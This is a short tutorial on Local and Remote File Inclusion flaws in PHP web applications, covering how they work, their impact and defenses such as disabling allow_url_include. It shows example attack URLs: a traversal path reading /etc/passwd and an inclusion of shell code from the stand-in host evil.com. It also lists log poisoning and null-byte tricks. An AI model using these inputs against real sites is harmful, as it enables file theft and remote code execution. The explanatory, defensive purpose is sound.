LFI / RFI Attacks
1 Global Definition
File Inclusion vulnerabilities occur when a web application dynamically includes files without proper validation. They are divided into:
- LFI (Local File Inclusion): The attacker includes files already present on the target server.
- RFI (Remote File Inclusion): The attacker includes external files hosted on a remote server they control.
Both can lead to information disclosure, code execution, or full server compromise.
1.1 How LFI Works
LFI occurs when the application uses user input in file paths without sanitization.
http://example.com/index.php?page=about.php
An attacker can manipulate the page parameter:
http://example.com/index.php?page=../../etc/passwd
This can expose sensitive files like /etc/passwd on Linux, revealing user accounts.
1.2 How RFI Works
RFI occurs when the application loads files from external sources. Example:
http://example.com/index.php?page=http://evil.com/shell.txt
The malicious file might contain PHP code that executes commands on the target server, leading to a remote shell.
1.3 Real-World Impact
- Information Disclosure: Attackers read sensitive files such as config files.
- Privilege Escalation: LFI may allow access to log files that can be injected with malicious code.
- Remote Code Execution: With RFI, attackers execute arbitrary code from external servers.
- Large-Scale Breaches: Many high-profile PHP applications (WordPress plugins, Joomla, etc.) have been exploited via RFI.
1.4 Common Exploitation Techniques
- Directory Traversal to read sensitive files.
- Null Byte Injection to bypass file extension checks.
- Injecting PHP code into server logs and loading them via LFI.
- Hosting malicious payloads remotely for RFI exploitation.
1.5 Defense Strategies
- Never include files based on user input.
- Use whitelisting instead of blacklisting.
- Disable
allow_url_include
in
php.ini. - Apply input validation and sanitization for parameters.
- Restrict application access with least privilege policies.
1.6 Why It Matters
LFI and RFI remain among the most critical vulnerabilities in PHP and web applications. They can lead to full server compromise, data theft, and even supply chain attacks. These flaws are regularly highlighted in the OWASP Top 10.